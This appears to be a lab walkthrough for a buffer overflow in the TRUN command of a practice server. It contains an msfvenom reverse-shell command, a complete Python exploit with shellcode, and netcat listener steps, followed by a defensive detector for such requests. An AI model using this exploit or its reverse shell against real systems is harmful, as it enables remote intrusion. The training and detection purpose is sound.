Generating Shellcode

PRACTICE ! PRACTICE ! PRACTICE !

In order to generate the shellcode, we again use a Metasploit-powered tool called msfvenom:

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=1111 EXITFUNC=thread -f c -a x86 -b "\x00" > payload

Let's drop this into our Python script and run the exploit to get R00T :)

#!/usr/bin/env python3

import sys
import socket

# Shellcode generated by the msfvenom command above (bad char \x00 excluded),
# kept as a bytes literal so the script runs under Python 3 as well as 2.
overflow = (b"\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
            b"\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x9c\xe3\x9a\x4e\xa2"
            b"\x14\xd8\xb1\x5a\xe5\xbd\x38\xbf\xd4\xfd\x5f\xb4\x47\xce"
            b"\x14\x98\x6b\xa5\x79\x08\xff\xcb\x55\x3f\x48\x61\x80\x0e"
            b"\x49\xda\xf0\x11\xc9\x21\x25\xf1\xf0\xe9\x38\xf0\x35\x17"
            b"\xb0\xa0\xee\x53\x67\x54\x9a\x2e\xb4\xdf\xd0\xbf\xbc\x3c"
            b"\xa0\xbe\xed\x93\xba\x98\x2d\x12\x6e\x91\x67\x0c\x73\x9c"
            b"\x3e\xa7\x47\x6a\xc1\x61\x96\x93\x6e\x4c\x16\x66\x6e\x89"
            b"\x91\x99\x05\xe3\xe1\x24\x1e\x30\x9b\xf2\xab\xa2\x3b\x70"
            b"\x0b\x0e\xbd\x55\xca\xc5\xb1\x12\x98\x81\xd5\xa5\x4d\xba"
            b"\xe2\x2e\x70\x6c\x63\x74\x57\xa8\x2f\x2e\xf6\xe9\x95\x81"
            b"\x07\xe9\x75\x7d\xa2\x62\x9b\x6a\xdf\x29\xf4\x5f\xd2\xd1"
            b"\x04\xc8\x65\xa2\x36\x57\xde\x2c\x7b\x10\xf8\xab\x7c\x0b"
            b"\xbc\x23\x83\xb4\xbd\x6a\x40\xe0\xed\x04\x61\x89\x65\xd4"
            b"\x8e\x5c\x29\x84\x20\x0f\x8a\x74\x81\xff\x62\x9e\x0e\xdf"
            b"\x93\xa1\xc4\x48\x39\x58\x8f\xb6\x16\x62\x26\x5f\x65\x62"
            b"\xb9\x24\xe0\x84\xd3\x4a\xa5\x1f\x4c\xf2\xec\xeb\xed\xfb"
            b"\x3a\x96\x2e\x77\xc9\x67\xe0\x70\xa4\x7b\x95\x70\xf3\x21"
            b"\x30\x8e\x29\x4d\xde\x1d\xb6\x8d\xa9\x3d\x61\xda\xfe\xf0"
            b"\x78\x8e\x12\xaa\xd2\xac\xee\x2a\x1c\x74\x35\x8f\xa3\x75"
            b"\xb8\xab\x87\x65\x04\x33\x8c\xd1\xd8\x62\x5a\x8f\x9e\xdc"
            b"\x2c\x79\x49\xb2\xe6\xed\x0c\xf8\x38\x6b\x11\xd5\xce\x93"
            b"\xa0\x80\x96\xac\x0d\x45\x1f\xd5\x73\xf5\xe0\x0c\x30\x15"
            b"\x03\x84\x4d\xbe\x9a\x4d\xec\xa3\x1c\xb8\x33\xda\x9e\x48"
            b"\xcc\x19\xbe\x39\xc9\x66\x78\xd2\xa3\xf7\xed\xd4\x10\xf7"
            b"\x27")

# Buffer layout: 2003 bytes of filler up to EIP, the 4-byte pointer address
# from essfunc.dll (little-endian), a 32-byte NOP sled, then the shellcode.
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.104', 9999))

    # The vulnerable TRUN command is sent with the full buffer as its argument.
    s.send(b'TRUN /.:/' + shellcode)
    s.close()

except socket.error as exc:
    print("Error ! %s" % exc)
    sys.exit(1)

  • The 2003 A's fill the buffer up to EIP; the next 4 bytes overwrite EIP with the pointer address from essfunc.dll (written in little-endian byte order). After that we add some NOPs (No Operation instructions), which are just padding between the pointer address and our malicious shellcode so that the two do not collide. Finally we append the malicious shellcode, which is stored in the variable called overflow.

  • Set up a netcat listener on LPORT 1111 and run the Python script to get R00T.
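From the defender's side, the buffer layout just described is exactly what a network sensor can look for. Here is an added example (not code from the original page) that inspects a captured TRUN request for those indicators: an oversized argument, a long run of one filler byte, a NOP sled and raw bytes in what should be a text protocol. The sample requests are constructed, and the thresholds are assumptions to be tuned against real traffic.

```python
import re
from itertools import groupby

# Constructed sample of what the script above sends to TCP/9999: the TRUN
# command, 2003 filler bytes, a 4-byte return address, a 32-byte NOP sled and
# the shellcode (shortened here to a few stand-in bytes).
SAMPLE_EXPLOIT_REQUEST = (
    b"TRUN /.:/" + b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32
    + b"\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d"
)
# Constructed benign request of the kind a normal client would send.
SAMPLE_BENIGN_REQUEST = b"TRUN /.:/hello\r\n"

# Assumed thresholds; tune them to the service's real traffic.
MAX_ARG_LEN = 512       # TRUN arguments longer than this are abnormal
MIN_BYTE_RUN = 64       # a long run of one byte is classic overflow filler
MIN_NOP_SLED = 16       # 16+ consecutive 0x90 bytes is a NOP sled
MAX_NONPRINTABLE = 8    # a text protocol should carry very few raw bytes


def inspect_trun_request(data: bytes) -> dict:
    """Inspect one TRUN request and report overflow indicators found in it."""
    m = re.match(rb"TRUN\s*(.*)", data, re.DOTALL)
    if m is None:
        return {"is_trun": False, "suspicious": False, "reasons": []}
    arg = m.group(1)
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized argument: %d bytes" % len(arg))
    # Longest run of a single repeated byte (the 2003 x "A" filler above).
    longest = max((len(list(g)) for _, g in groupby(arg)), default=0)
    if longest >= MIN_BYTE_RUN:
        reasons.append("repeated-byte filler: run of %d" % longest)
    sled = re.search(rb"\x90{%d,}" % MIN_NOP_SLED, arg)
    if sled:
        reasons.append("NOP sled: %d bytes" % len(sled.group(0)))
    # Bytes outside printable ASCII (plus CR/LF/TAB) in a text command.
    nonprint = sum(1 for b in arg if not (0x20 <= b <= 0x7e or b in b"\r\n\t"))
    if nonprint > MAX_NONPRINTABLE:
        reasons.append("raw bytes in text protocol: %d" % nonprint)
    return {"is_trun": True, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for req in (SAMPLE_EXPLOIT_REQUEST, SAMPLE_BENIGN_REQUEST):
        print(inspect_trun_request(req))
```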
